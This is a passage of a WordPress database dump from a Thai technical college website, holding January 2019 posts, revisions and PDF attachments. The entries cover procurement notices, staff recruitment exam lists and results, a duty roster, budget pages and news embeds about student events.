href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/%E0%B8%9D%E0%B9%88%E0%B8%B2%E0%B8%A2%E0%B8%A7%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%20%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B1%E0%B8%99%E0%B8%84%E0%B8%B8%E0%B8%93%E0%B8%A0%E0%B8%B2%E0%B8%9E/%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B9%83%E0%B8%8A%E0%B9%89%E0%B9%80%E0%B8%81%E0%B9%87%E0%B8%9A%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5/%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%A1%E0%B8%B7%E0%B8%AD.zip\">แบบฟอร์มเครื่องมือที่ใช้เก็บรวบรวมข้อมูล</a></strong></h3>\r\n<h3><span style=\"color: #0000ff;\"><a href=\"/รายงานการประเมินตนเอง-sar\">รายงานการประเมินตนเอง (SAR)</a> </span></h3>\r\n<h3><a href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99-%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9-2/\"><span style=\"color: #0000ff;\"><strong>ข้อมูลนักเรียน นักศึกษา</strong></span></a></h3>\r\n<h3><a href=\"/มาตรฐานการศึกษาสถานศึก\"><span style=\"color: #0000ff;\">มาตรฐานการศึกษาสถานศึกษา</span></a></h3>\r\n \r\n\r\n ', 'งานประกันคุณภาพและมาตรฐานการศึกษา', '', 'inherit', 'closed', 'closed', '', '1753-revision-v1', '', '', '2019-01-28 14:22:06', '2019-01-28 07:22:06', '', 1753, 'http://www.technicrayong.ac.th/1753-revision-v1/', 0, 'revision', '', 0),
(5115, 3, '2019-01-29 15:47:06', '2019-01-29 08:47:06', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B9%80%E0%B8%9C%E0%B8%A2%E0%B9%81%E0%B8%9E%E0%B8%A3%E0%B9%88%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%88%E0%B8%B3%E0%B8%9B%E0%B8%B5%E0%B8%87%E0%B8%9A%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%A1%E0%B8%B2%E0%B8%93-2562.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ เผยแพร่แผนการจัดซื้อจัดจ้าง ประจำปีงบประมาณ พ.ศ.๒๕๖๒', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b9%80%e0%b8%9c%e0%b8%a2%e0%b9%81%e0%b8%9e%e0%b8%a3%e0%b9%88%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%8b%e0%b8%b7%e0%b9%89', '', '', '2019-01-29 15:48:21', '2019-01-29 08:48:21', '', 0, 'http://www.technicrayong.ac.th/?p=5115', 149, 'post', '', 0),
(5116, 3, '2019-01-29 15:46:50', '2019-01-29 08:46:50', '', 'ประกาศ เผยแพร่การจัดซื้อจัดจ้างประจำปีงบประมาณ 2562', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b9%80%e0%b8%9c%e0%b8%a2%e0%b9%81%e0%b8%9e%e0%b8%a3%e0%b9%88%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%8b%e0%b8%b7%e0%b9%89', '', '', '2019-01-29 15:46:50', '2019-01-29 08:46:50', '', 5115, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/ประกาศ-เผยแพร่การจัดซื้อจัดจ้างประจำปีงบประมาณ-2562.pdf', 0, 'attachment', 'application/pdf', 0),
(5117, 3, '2019-01-29 15:47:06', '2019-01-29 08:47:06', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B9%80%E0%B8%9C%E0%B8%A2%E0%B9%81%E0%B8%9E%E0%B8%A3%E0%B9%88%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%88%E0%B8%B3%E0%B8%9B%E0%B8%B5%E0%B8%87%E0%B8%9A%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%A1%E0%B8%B2%E0%B8%93-2562.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ เผยแพร่การจัดซื้อจัดจ้างประจำปีงบประมาณ พ.ศ.๒๕๖๒', '', 'inherit', 'closed', 'closed', '', '5115-revision-v1', '', '', '2019-01-29 15:47:06', '2019-01-29 08:47:06', '', 5115, 'http://www.technicrayong.ac.th/5115-revision-v1/', 0, 'revision', '', 0),
(5118, 3, '2019-01-29 15:48:57', '2019-01-29 08:48:57', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B9%80%E0%B8%9C%E0%B8%A2%E0%B9%81%E0%B8%9E%E0%B8%A3%E0%B9%88%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%88%E0%B8%B3%E0%B8%9B%E0%B8%B5%E0%B8%87%E0%B8%9A%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%A1%E0%B8%B2%E0%B8%93-2562.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ เผยแพร่แผนการจัดซื้อจัดจ้าง ประจำปีงบประมาณ พ.ศ.๒๕๖๒', '', 'inherit', 'closed', 'closed', '', '5115-autosave-v1', '', '', '2019-01-29 15:48:57', '2019-01-29 08:48:57', '', 5115, 'http://www.technicrayong.ac.th/5115-autosave-v1/', 0, 'revision', '', 0),
(5119, 3, '2019-01-29 15:48:21', '2019-01-29 08:48:21', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B9%80%E0%B8%9C%E0%B8%A2%E0%B9%81%E0%B8%9E%E0%B8%A3%E0%B9%88%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%88%E0%B8%B3%E0%B8%9B%E0%B8%B5%E0%B8%87%E0%B8%9A%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%A1%E0%B8%B2%E0%B8%93-2562.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ เผยแพร่แผนการจัดซื้อจัดจ้าง ประจำปีงบประมาณ พ.ศ.๒๕๖๒', '', 'inherit', 'closed', 'closed', '', '5115-revision-v1', '', '', '2019-01-29 15:48:21', '2019-01-29 08:48:21', '', 5115, 'http://www.technicrayong.ac.th/5115-revision-v1/', 0, 'revision', '', 0),
(5120, 3, '2019-01-29 16:00:15', '2019-01-29 09:00:15', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B5%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B8%AA%E0%B8%AD%E0%B8%9A-%E0%B8%97%E0%B8%B3%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B9%80%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-3-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้มีสิทธิสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่เจ้าหน้าที่ธุรการ จำนวน ๓ อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%a1%e0%b8%b5%e0%b8%aa%e0%b8%b4%e0%b8%97-8', '', '', '2019-01-29 16:00:15', '2019-01-29 09:00:15', '', 0, 'http://www.technicrayong.ac.th/?p=5120', 148, 'post', '', 0),
(5121, 3, '2019-01-29 16:00:02', '2019-01-29 09:00:02', '', 'ประกาศ รายชื่อผู้มีสิทธิสอบ ทำหน้าที่เจ้าหน้าที่ จำนวน 3 อัตรา', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%a1%e0%b8%b5%e0%b8%aa%e0%b8%b4%e0%b8%97-8', '', '', '2019-01-29 16:00:02', '2019-01-29 09:00:02', '', 5120, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/ประกาศ-รายชื่อผู้มีสิทธิสอบ-ทำหน้าที่เจ้าหน้าที่-จำนวน-3-อัตรา.pdf', 0, 'attachment', 'application/pdf', 0),
(5122, 3, '2019-01-29 16:00:15', '2019-01-29 09:00:15', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B5%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B8%AA%E0%B8%AD%E0%B8%9A-%E0%B8%97%E0%B8%B3%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B9%80%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-3-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้มีสิทธิสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่เจ้าหน้าที่ธุรการ จำนวน ๓ อัตรา', '', 'inherit', 'closed', 'closed', '', '5120-revision-v1', '', '', '2019-01-29 16:00:15', '2019-01-29 09:00:15', '', 5120, 'http://www.technicrayong.ac.th/5120-revision-v1/', 0, 'revision', '', 0),
(5123, 3, '2019-01-29 16:28:34', '2019-01-29 09:28:34', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D746316315744559%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันเสาร์ที่ ๑๙ มกราคม ๒๕๖๒ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง คณะผู้บริหาร พบปะและชี้แจงการเรียนในสายอาชีพ ให้แก่นักเรียนที่มารายงานตัวมอบตัว(รอบโควตา) ในระดับ ปวช. ประจำปีการศึกษา ๒๕๖๒ ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '5062-revision-v1', '', '', '2019-01-29 16:28:34', '2019-01-29 09:28:34', '', 5062, 'http://www.technicrayong.ac.th/5062-revision-v1/', 0, 'revision', '', 0),
(5124, 3, '2019-01-29 16:35:47', '2019-01-29 09:35:47', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B8%81%E0%B8%B8%E0%B8%A1%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%B1%E0%B8%99%E0%B8%98%E0%B9%8C-2562.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนกุมภาพันธ์ ๒๕๖๒', '', 'publish', 'closed', 'open', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%a7%e0%b8%a3-%e0%b9%80%e0%b8%94%e0%b8%b7%e0%b8%ad%e0%b8%99%e0%b8%81%e0%b8%b8%e0%b8%a1%e0%b8%a0%e0%b8%b2%e0%b8%9e%e0%b8%b1%e0%b8%99-2', '', '', '2019-01-29 16:35:47', '2019-01-29 09:35:47', '', 0, 'http://www.technicrayong.ac.th/?p=5124', 147, 'post', '', 0),
(5125, 3, '2019-01-29 16:35:31', '2019-01-29 09:35:31', '', 'ตารางเวร เดือนกุมภาพันธ์ 2562', '', 'inherit', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b2%e0%b8%a3%e0%b8%b2%e0%b8%87%e0%b9%80%e0%b8%a7%e0%b8%a3-%e0%b9%80%e0%b8%94%e0%b8%b7%e0%b8%ad%e0%b8%99%e0%b8%81%e0%b8%b8%e0%b8%a1%e0%b8%a0%e0%b8%b2%e0%b8%9e%e0%b8%b1%e0%b8%99-2', '', '', '2019-01-29 16:35:31', '2019-01-29 09:35:31', '', 5124, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/ตารางเวร-เดือนกุมภาพันธ์-2562.pdf', 0, 'attachment', 'application/pdf', 0),
(5126, 3, '2019-01-29 16:35:47', '2019-01-29 09:35:47', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B8%81%E0%B8%B8%E0%B8%A1%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%B1%E0%B8%99%E0%B8%98%E0%B9%8C-2562.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนกุมภาพันธ์ ๒๕๖๒', '', 'inherit', 'closed', 'closed', '', '5124-revision-v1', '', '', '2019-01-29 16:35:47', '2019-01-29 09:35:47', '', 5124, 'http://www.technicrayong.ac.th/5124-revision-v1/', 0, 'revision', '', 0),
(5127, 3, '2019-01-29 16:36:05', '2019-01-29 09:36:05', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%A7%E0%B8%A3-%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B8%81%E0%B8%B8%E0%B8%A1%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%B1%E0%B8%99%E0%B8%98%E0%B9%8C-2562.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนกุมภาพันธ์ ๒๕๖๒', '', 'inherit', 'closed', 'closed', '', '5124-autosave-v1', '', '', '2019-01-29 16:36:05', '2019-01-29 09:36:05', '', 5124, 'http://www.technicrayong.ac.th/5124-autosave-v1/', 0, 'revision', '', 0),
(5128, 3, '2019-01-30 09:58:05', '2019-01-30 02:58:05', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F06%2F%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A3-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">ข้อมูลบุคลากร ปี 2562</span></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/ข้อมูลบุคคลากร-2561.pdf\">ข้อมูลบุคลากร ปี 2561</a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/ข้อมูลบุคคลากร2560.pdf\">ข้อมูลบุคลากร ปี 2560</a></h3>', 'ข้อมูลบุคลากร', '', 'inherit', 'closed', 'closed', '', '1354-revision-v1', '', '', '2019-01-30 09:58:05', '2019-01-30 02:58:05', '', 1354, 'http://www.technicrayong.ac.th/1354-revision-v1/', 0, 'revision', '', 0),
(5130, 3, '2019-01-30 10:02:15', '2019-01-30 03:02:15', '<h2><span style=\"color: #0000ff;\">ข้อมูลงบประมาณ ปีการศึกษา 2562</span></h2>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F02%2F%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%87%E0%B8%9A%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%A1%E0%B8%B2%E0%B8%93-%E0%B8%9B%E0%B8%B5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2-2562.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h2><a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A7%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%87%E0%B8%9A%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%A1%E0%B8%B2%E0%B8%93/\"><span style=\"color: #ff00ff;\">Link งานวางแผนและงบประมาณ</span></a></h2>\r\n<h2><a href=\"/ข้อมูลงบประมาณ61\"><span style=\"color: #0000ff;\">ข้อมูลงบประมาณ ปีการศึกษา 2561</span></a></h2>', 'ข้อมูลงบประมาณ', '', 'publish', 'closed', 'closed', '', '%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%87%e0%b8%9a%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%a1%e0%b8%b2%e0%b8%93', '', '', '2019-02-22 13:59:04', '2019-02-22 06:59:04', '', 0, 'http://www.technicrayong.ac.th/?page_id=5130', 0, 'page', '', 0),
(5131, 3, '2019-01-30 10:02:15', '2019-01-30 03:02:15', '<h2>ข้อมูลงบประมาณ ปีการศึกษา 2562</h2>\r\n<h2><a href=\"http://www.technicrayong.ac.th/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%87%E0%B8%9A%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%A1%E0%B8%B2%E0%B8%9361/?preview_id=1445&preview_nonce=73b05cbb64&_thumbnail_id=-1&preview=true\"><span style=\"color: #0000ff;\">ข้อมูลงบประมาณ ปีการศึกษา 2561</span></a></h2>', 'ข้อมูลงบประมาณ', '', 'inherit', 'closed', 'closed', '', '5130-revision-v1', '', '', '2019-01-30 10:02:15', '2019-01-30 03:02:15', '', 5130, 'http://www.technicrayong.ac.th/5130-revision-v1/', 0, 'revision', '', 0),
(5132, 3, '2019-02-22 13:59:19', '2019-02-22 06:59:19', '<h2><span style=\"color: #0000ff;\">ข้อมูลงบประมาณ ปีการศึกษา 2562</span></h2>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F02%2F%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%87%E0%B8%9A%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%A1%E0%B8%B2%E0%B8%93-%E0%B8%9B%E0%B8%B5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2-2562.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h2><a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A7%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%87%E0%B8%9A%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%A1%E0%B8%B2%E0%B8%93/\"><span style=\"color: #ff00ff;\">Link งานวางแผนและงบประมาณ</span></a></h2>\r\n<h2><a href=\"/ข้อมูลงบประมาณ61\"><span style=\"color: #0000ff;\">ข้อมูลงบประมาณ ปีการศึกษา 2561</span></a></h2>', 'ข้อมูลงบประมาณ', '', 'inherit', 'closed', 'closed', '', '5130-autosave-v1', '', '', '2019-02-22 13:59:19', '2019-02-22 06:59:19', '', 5130, 'http://www.technicrayong.ac.th/5130-autosave-v1/', 0, 'revision', '', 0),
(5133, 3, '2019-01-30 10:04:48', '2019-01-30 03:04:48', '<h2>ข้อมูลงบประมาณ ปีการศึกษา 2562</h2>\r\n<h2><a href=\"http://www.technicrayong.ac.th/ข้อมูลงบประมาณ61\"><span style=\"color: #0000ff;\">ข้อมูลงบประมาณ ปีการศึกษา 2561</span></a></h2>', 'ข้อมูลงบประมาณ', '', 'inherit', 'closed', 'closed', '', '5130-revision-v1', '', '', '2019-01-30 10:04:48', '2019-01-30 03:04:48', '', 5130, 'http://www.technicrayong.ac.th/5130-revision-v1/', 0, 'revision', '', 0),
(5134, 3, '2019-01-31 09:30:11', '2019-01-31 02:30:11', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9C%E0%B8%A5%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81-%E0%B9%80%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B8%98%E0%B8%B8%E0%B8%A3%E0%B8%81%E0%B8%B2%E0%B8%A3-3-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่เจ้าหน้าที่ธุรการ จำนวน ๓ อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9c%e0%b8%a5%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%81%e0%b9%80%e0%b8%9b-3', '', '', '2019-01-31 09:30:11', '2019-01-31 02:30:11', '', 0, 'http://www.technicrayong.ac.th/?p=5134', 146, 'post', '', 0),
(5135, 3, '2019-01-31 09:21:59', '2019-01-31 02:21:59', '', 'ประกาศ ผลสอบคัดเลือก เจ้าหน้าที่ธุรการ 3 อัตรา', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9c%e0%b8%a5%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%81-%e0%b9%80%e0%b8%88%e0%b9%89', '', '', '2019-01-31 09:21:59', '2019-01-31 02:21:59', '', 5134, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/ประกาศ-ผลสอบคัดเลือก-เจ้าหน้าที่ธุรการ-3-อัตรา.pdf', 0, 'attachment', 'application/pdf', 0),
(5136, 3, '2019-01-31 09:30:11', '2019-01-31 02:30:11', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9C%E0%B8%A5%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81-%E0%B9%80%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B8%98%E0%B8%B8%E0%B8%A3%E0%B8%81%E0%B8%B2%E0%B8%A3-3-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่เจ้าหน้าที่ธุรการ จำนวน ๓ อัตรา', '', 'inherit', 'closed', 'closed', '', '5134-revision-v1', '', '', '2019-01-31 09:30:11', '2019-01-31 02:30:11', '', 5134, 'http://www.technicrayong.ac.th/5134-revision-v1/', 0, 'revision', '', 0),
(5137, 3, '2019-01-31 11:29:34', '2019-01-31 04:29:34', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D753195305056660%26id%3D100010985913485&width=500\" width=\"500\" height=\"688\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพฤหัสบดีที่ ๓๑ มกราคม ๒๕๖๒ นักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง เข้าร่วมอบรมเกี่ยวกับการใช้รถใช้ถนนอย่างถูกต้อง ภายใต้โครงการนักเรียนรุ่นใหม่มีใบขับขี่ ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%a4%e0%b8%ab%e0%b8%b1%e0%b8%aa%e0%b8%9a%e0%b8%94%e0%b8%b5%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%93%e0%b9%91-%e0%b8%a1%e0%b8%81%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%a1', '', '', '2019-01-31 11:29:34', '2019-01-31 04:29:34', '', 0, 'http://www.technicrayong.ac.th/?p=5137', 145, 'post', '', 0),
